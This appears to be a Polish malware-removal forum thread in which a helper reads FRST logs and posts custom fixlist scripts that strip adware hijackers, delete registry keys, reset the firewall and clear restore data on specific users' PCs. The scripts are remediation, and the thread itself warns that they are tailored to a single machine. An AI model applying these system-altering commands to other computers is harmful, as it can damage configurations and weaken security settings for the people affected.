Właściwe logi zostały uzupełnione. Dodaj jeszcze log z USBFix z opcji Listing zrobiony przy podpiętym pendrive. Log ten dostarcz już w nowym poście, nie edytuj pierwszego.

DelFix wykonał co należy. Skasuj z dysku plik C:\delfix.txt. To tyle.

Skróty LNK Chrome są zmodyfikowane przez adware. Poza tym, na dysku pozostał cały profil odinstalowanego Firefoxa zaśmiecony adware. Jaki błąd występuje przy próbie deinstalacji Photoshopa? Natomiast by dało się poprawnie odinstalować ArchiCAD, trzeba tymczasowo przywrócić starą wersję Java dopasowaną do konkretnej wersji ArchiCAD. Podobny temat z forum: KLIK. W linku są instalatory Java dopasowane do wersji ArchiCAD 15 i ArchiCAD 16: KLIK Dodatkowo, notuję tu problem z tworzeniem punktów Przywracania systemu: Dziennik Aplikacja: ================== Error: (12/05/2015 02:06:46 PM) (Source: System Restore) (EventID: 8193) (User: ) Description: Nie można utworzyć punktu przywracania (Proces = C:\Windows\system32\srtasks.exe ExecuteScheduledSPPCreation; Opis = Zaplanowany punkt kontrolny; Błąd = 0x80070422). Error: (12/05/2015 12:19:26 PM) (Source: System Restore) (EventID: 8193) (User: ) Description: Nie można utworzyć punktu przywracania (Proces = C:\Windows\system32\msiexec.exe /V; Opis = Removed Apple Software Update; Błąd = 0x80070422). Error: (12/05/2015 12:19:21 PM) (Source: System Restore) (EventID: 8193) (User: ) Description: Nie można utworzyć punktu przywracania (Proces = C:\Windows\system32\msiexec.exe /V; Opis = Usunięto SketchUp Import 2016.; Błąd = 0x80070422). Akcje do wykonania: 1. Wejdź do konfiguracji Przywracania systemu i sprawdź co widać na liście dysków, czy przypadkiem nie widnieje tam jakaś zaznaczona pozycja opisana jako BRAK. Gdyby coś takiego było, odznacz ten element i zaznacz właściwy wolumin z Windows. 2. Deinstalacje: - Uporaj się z w/w ArchiCADem i Javą. Dodatkowo, został odinstalowany AutoCAD, ale nadal jest powiązany program Autodesk Featured Apps 2016. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadki Autodesk Content Service Language Pack, Corel Graphics - Windows Shell Extension 64 Bit > Dalej. Narzędzie uruchomione dwa razy. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: ShortcutWithArgument: C:\Users\Natalia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.mystartsearch.com/?type=sc&ts=1443865678&z=4372d6f78e54e349a3111b4g8z2zbc5beqdw4z4mcz&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 ShortcutWithArgument: C:\Users\Natalia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.mystartsearch.com/?type=sc&ts=1443865678&z=4372d6f78e54e349a3111b4g8z2zbc5beqdw4z4mcz&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.mystartsearch.com/?type=sc&ts=1443865678&z=4372d6f78e54e349a3111b4g8z2zbc5beqdw4z4mcz&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.istartsurf.com/?type=hppp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.istartsurf.com/?type=hppp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.istartsurf.com/?type=hppp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.istartsurf.com/?type=hppp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1440869918-637336674-2589777491-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://do-search.com/web/?type=ds&ts=1429100351&from=cor&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362&q={searchTerms} HKU\S-1-5-21-1440869918-637336674-2589777491-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie HKU\S-1-5-21-1440869918-637336674-2589777491-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://do-search.com/web/?type=ds&ts=1429100351&from=cor&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362&q={searchTerms} HKU\S-1-5-21-1440869918-637336674-2589777491-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.istartsurf.com/?type=hppp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 HKU\S-1-5-21-1440869918-637336674-2589777491-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.istartsurf.com/?type=hppp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.istartsurf.com/web/?type=dspp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.istartsurf.com/web/?type=dspp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.istartsurf.com/web/?type=dspp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.istartsurf.com/web/?type=dspp&ts=1436004170&z=26e8c3fba88e796efb33bc5g9z7c0qee1e1zbg1q5b&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362&q={searchTerms} SearchScopes: HKU\S-1-5-21-1440869918-637336674-2589777491-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-1440869918-637336674-2589777491-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.istartsurf.com/web/?utm_source=b&utm_medium=cornl&utm_campaign=install_ie&utm_content=ds&from=cornl&uid=WDCXWD15EVDS-63V9B1_WD-WMAVU427336273362&ts=1436004179&type=default&q={searchTerms} BHO-x32: Brak nazwy -> {51D26BB4-4D2C-4AE4-9873-5FF41B6DED1F} -> Brak pliku BHO-x32: Sale Charger -> {7a38e53c-e000-41e4-9b5a-47447db81c2b} -> C:\Program Files (x86)\Sale Charger\Extensions\7a38e53c-e000-41e4-9b5a-47447db81c2b.dll => Brak pliku BHO-x32: Digital More -> {c0b1016f-b7e5-46f0-b415-6bf9e55ab00d} -> C:\Program Files (x86)\Digital More\Extensions\c0b1016f-b7e5-46f0-b415-6bf9e55ab00d.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Natalia\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{0B628DE4-07AD-4284-81CA-5B439F67C5E6}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{149DD748-EA85-45A6-93C5-AC50D0260C98}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{5370C727-1451-4700-A960-77630950AF6D}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2016\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{7DE1BE5C-CEBA-4F1D-ACBC-9CE11EE9A2A1}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{BD0DEB94-63DB-4392-9420-6EEE05094B1F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2014\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2016\pl-PL\acadficn.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-1440869918-637336674-2589777491-1001_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\Natalia\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll => Brak pliku HKLM\...\Run: [Corel Photo Downloader] => "C:\Program Files (x86)\Common Files\Corel\Corel PhotoDownloader\Corel Photo Downloader.exe" -startup HKLM-x32\...\Run: [fst_pl_89] => [X] HKU\S-1-5-21-1440869918-637336674-2589777491-1001\...\Run: [AirDroid 3] => C:\Program Files (x86)\AirDroid\AirDroid.exe /start HKU\S-1-5-21-1440869918-637336674-2589777491-1001\...\Run: [Akamai NetSession Interface] => "C:\Users\Natalia\AppData\Local\Akamai\netsession_win.exe" HKU\S-1-5-21-1440869918-637336674-2589777491-1001\...\RunOnce: [Autodesk 3ds Max 2014] => C:\Autodesk\Autodesk_3ds_Max_2014_EFGJKS_Win_64bit_wi_en-US\Setup.exe /url "hxxp://trial2.autodesk.com/SWDLDNET3/2014/3DSMAX/WI/EDU/Autodesk_3ds_Max_2014_EFGJKS_Win_64bit_wi_en-US_Setup.exe" /SN 900-2 (dane wartości zawierają 77 znaków więcej). HKU\S-1-5-21-1440869918-637336674-2589777491-1001\...\Policies\Explorer: [] AppInit_DLLs: C:\PROGRA~2\SupTab\SEARCH~2.DLL => Brak pliku AppInit_DLLs-x32: c:\progra~2\suptab\search~1.dll => Brak pliku Startup: C:\Users\Natalia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration Heroes of Might & Magic 5.LNK [2015-08-21] BootExecute: Task: {183F4B69-059E-450D-B681-274B5E3DF29D} - System32\Tasks\bench-sys => C:\Program Files (x86)\Bench\Updater\updater.exe Task: {2D95A955-ABC0-4AD5-910C-43BF6BC18C00} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe Task: {324111B4-6966-429B-B726-D4290FE0241C} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1440869918-637336674-2589777491-1001UA => C:\Users\Natalia\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-26] (Facebook Inc.) Task: {4BD48A32-7D2C-442F-9908-69A534E5E9FA} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1440869918-637336674-2589777491-1001Core => C:\Users\Natalia\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-07-26] (Facebook Inc.) Task: {DC729C7C-6ADC-4DD0-A562-AB3F00F00442} - System32\Tasks\{500AF091-F61E-4C71-88B1-2C787ADB8720} => pcalua.exe -a C:\Users\Natalia\AppData\Roaming\do-search\UninstallManager.exe -c -ptid=cor Task: C:\Windows\Tasks\bench-sys.job => C:\Program Files (x86)\Bench\Updater\updater.exe Task: C:\Windows\Tasks\bench-Updater removing.job => /verysilent WORKGROUP NATALKA This will uninstall Updater Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1440869918-637336674-2589777491-1001Core.job => C:\Users\Natalia\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1440869918-637336674-2589777491-1001UA.job => C:\Users\Natalia\AppData\Local\Facebook\Update\FacebookUpdate.exe S3 cpuz136; \??\C:\Windows\TEMP\cpuz136\cpuz136_x64.sys [X] S1 tcfd_vw_1_10_0_24; system32\drivers\tcfd_vw_1_10_0_24.sys [X] S2 Update Solution Real; "C:\Program Files (x86)\Solution Real\updateSolutionReal.exe" [X] S2 Util Solution Real; "C:\Program Files (x86)\Solution Real\bin\utilSolutionReal.exe" [X] S1 wafd_1_10_0_19; system32\drivers\wafd_1_10_0_19.sys [X] C:\Program Files (x86)\AirDroid C:\Program Files (x86)\Mozilla Firefox C:\Program Files (x86)\predm C:\Program Files (x86)\Solution Real C:\ProgramData\Corel C:\ProgramData\CorelDRAW Graphics Suite X5 C:\ProgramData\CorelDRAW Graphics Suite X6 C:\ProgramData\CorelDRAW Graphics Suite X7 x64 C:\ProgramData\GG C:\ProgramData\IePluginService C:\ProgramData\Mozilla C:\ProgramData\TEMP C:\ProgramData\WPM C:\ProgramData\Microsoft\Windows\Start Menu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\cdp.pl C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Sims C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZUZIA11 wersja demo\ZUZIA11 wersja demo - Pomoc techniczna.lnk C:\Users\Natalia\AppData\Local\ACCCx3_3_0_151.zip C:\Users\Natalia\AppData\Local\cache C:\Users\Natalia\AppData\Local\Corel C:\Users\Natalia\AppData\Local\Facebook C:\Users\Natalia\AppData\Local\GG C:\Users\Natalia\AppData\Local\Google\Chrome\User Data\Default C:\Users\Natalia\AppData\Local\Mozilla C:\Users\Natalia\AppData\Local\StormFall C:\Users\Natalia\AppData\Local\Windows Live C:\Users\Natalia\AppData\LocalLow\BitTorrent C:\Users\Natalia\AppData\Roaming\Corel C:\Users\Natalia\AppData\Roaming\eCyber C:\Users\Natalia\AppData\Roaming\Mozilla C:\Users\Natalia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nowy folder.lnk C:\Users\Natalia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Shure C:\Users\Natalia\Desktop\muza\ADAM\*.lnk C:\Users\Natalia\Documents\Corel\Próbki CorelDRAW X7\target.lnk C:\Users\Natalia\Documents\Corel\CorelDRAW X5 Samples\target.lnk C:\Windows\system32\*.tmp C:\Windows\SysWOW64\DB92BC2148.sys C:\Windows\SysWOW64\KGyGaAvL.sys DeleteKey: HKCU\Software\Headlight DeleteKey: HKCU\Software\InstallCore DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKCU\Software\Softonic DeleteKey: HKCU\Software\TutoTag DeleteKey: HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{444785F1-DE89-4295-863A-D46C3A781394} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EA34C851-D481-49F5-A356-3A8B0A8F3B7E} DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{1D2E52D0-C2AE-493E-BA52-2425A042D491} DeleteKey: HKLM\SOFTWARE\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\{1146AC44-2F03-4431-B4FD-889BC837521F} DeleteKey: HKLM\SOFTWARE\Wow6432Node\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0} DeleteKey: HKLM\SOFTWARE\Wow6432Node\{6791A2F3-FC80-475C-A002-C014AF797E9C} DeleteKey: HKLM\SOFTWARE\Wow6432Node\AdvertisingSupport DeleteKey: HKLM\SOFTWARE\Wow6432Node\Bench DeleteKey: HKLM\SOFTWARE\Wow6432Node\Discount Dragon DeleteKey: HKLM\SOFTWARE\Wow6432Node\do-searchSoftware DeleteKey: HKLM\SOFTWARE\Wow6432Node\FFPluginHp DeleteKey: HKLM\SOFTWARE\Wow6432Node\free_soft_to_day DeleteKey: HKLM\SOFTWARE\Wow6432Node\IePlugin DeleteKey: HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware DeleteKey: HKLM\SOFTWARE\Wow6432Node\mystartsearchSoftware DeleteKey: HKLM\SOFTWARE\Wow6432Node\qone8Software DeleteKey: HKLM\SOFTWARE\Wow6432Node\sweet-pageSoftware DeleteKey: HKLM\SOFTWARE\Wow6432Node\Tutorials DeleteKey: HKLM\SOFTWARE\Wow6432Node\Wpm DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{C0B1016F-B7E5-46F0-B415-6BF9E55AB00D} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{7A38E53C-E000-41E4-9B5A-47447DB81C2B} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{D879A501-50A7-BEFC-A4C5-32DC6E0CB208} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\CLSID\{5A4E3A41-FA55-4BDA-AED7-CEBE6E7BCB52} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{FC073BDA-C115-4A1D-9DF9-9B5C461482E5} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{1D2E52D0-C2AE-493E-BA52-2425A042D491} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\Interface\{4E6354DE-9115-4AEE-BD21-C46C3E8A49DB} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{067740F7-08E9-47C4-968D-5608B2014D50} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{9D99FA76-F233-472A-BE64-216CB861ABBE} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Classes\TypeLib\{A2D733A7-73B0-4C6B-B0C7-06A432950B66} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C0B1016F-B7E5-46F0-B415-6BF9E55AB00D} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7A38E53C-E000-41E4-9B5A-47447DB81C2B} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{51D26BB4-4D2C-4AE4-9873-5FF41B6DED1F} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\IePluginService DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Update Solution Real DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Util Solution Real DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\Wpm DeleteKey: HKU\S-1-5-18\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F} DeleteKey: HKU\S-1-5-19\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F} DeleteKey: HKU\S-1-5-20\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F} Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder /v Dropbox.lnk /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder /v "Registration Heroes of Might & Magic 5.LNK" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Akamai NetSession Interface" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "AirDroid 3" /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v Steam /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Corel Photo Downloader" /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID /v {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID /v {51D26BB4-4D2C-4AE4-9873-5FF41B6DED1F} /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID /v {EA34C851-D481-49F5-A356-3A8B0A8F3B7E} /f CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt.

Nie podałeś do jakich konkretnie plików się odnoszą te komunikaty. Opisywane problemy mogą być właśnie z przyczyny Comodo. Nawiasem mówiąc, to jest scrackowany Windows, patch plików systemowych... Zielona obwódka wokół okien FRST oznacza, że FRST został uruchomiony wirtualnie z piaskownicy Comodo, czyli poniekąd jest zablokowany. Stąd "Odmowa dostępu" ERUNT przy uruchomieniu (nie została wykonana kopia rewjestru przez FRST) oraz kilka dziwnych odczytów w raporcie (niemożność pobrania przez FRST danych o stanie niektórych usług). By FRST poprawnie pracował, nie może być uruchomiony z piaskownicy Comodo. Ale infekcja tu też jest: w starcie uruchamia się skrypt CsBoostMs.vbs, poza tym w Firefox jest szkodliwe rozszerzenie Video AdBlock for Firefox. Akcje do przeprowadzenia: 1. Uruchom ponownie FRST z poziomu Trybu awaryjnego Windows, gdy nie działa Comodo, nie wykonuj żadnego skanu. Chodzi o to, by FRST podczas uruchomienia zrzucił kopię rejestru do katalogu C:\FRST\Hives. 2. Usuwanie także z poziomu Trybu awaryjnego Windows. Otwórz Notatnik i wklej w nim: CloseProcesses: Startup: C:\Users\Pawel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CsBoostMs.vbs [2015-12-05] () FF Extension: Video AdBlock for Firefox - C:\Users\Pawel\AppData\Roaming\Mozilla\Firefox\Profiles\qjnud0lb.default\Extensions\{a00bef25-f21a-4539-adbb-b179b29e2b92} [2015-11-14] [brak podpisu cyfrowego] Task: {0A537669-4814-4663-946B-C61DAF51F208} - System32\Tasks\{04AAA47E-9FBE-4879-8B19-F2EFE9E88B5D} => pcalua.exe -a C:\Users\Pawel\Downloads\DDU.v15.5.1.0_www.INSTALKI.pl.exe -d C:\Users\Pawel\Downloads Task: {27D0E760-5679-498E-86DF-52E83B92C8AB} - System32\Tasks\{C3A85249-E845-4812-89EC-950462705DA1} => C:\Users\Pawel\Downloads\win64_152824.exe HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PAexec => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PAexec => ""="Service" HKLM-x32\...\Run: [] => [X] C:\Program Files (x86)\Temp Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Wszystko wykonane. Problem powinien być rozwiązany. Na koniec: 1. Mini poprawki. Otwórz Notatnik i wklej w nim: Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /ve /t REG_SZ /d Bing /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v URL /t REG_SZ /d "http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC" /f Reg: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" /v DisplayName /t REG_SZ /d "@ieframe.dll,-12512" /f RemoveDirectory: C:\FRST\Quarantine RemobeDirectory: C:\MATS RemoveDirectory: C:\ProgramData\Malwarebytes Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). 2. Skasuj pobrane narzędzia i ich logi z folderu C:\Users\tomek\Desktop\Nowy folder (5). Po tym zastosuj DelFix, a następnie wyczyść foldery Przywracania systemu: KLIK. 3. Zaktualizuj obie wersje Java oraz Firefox. 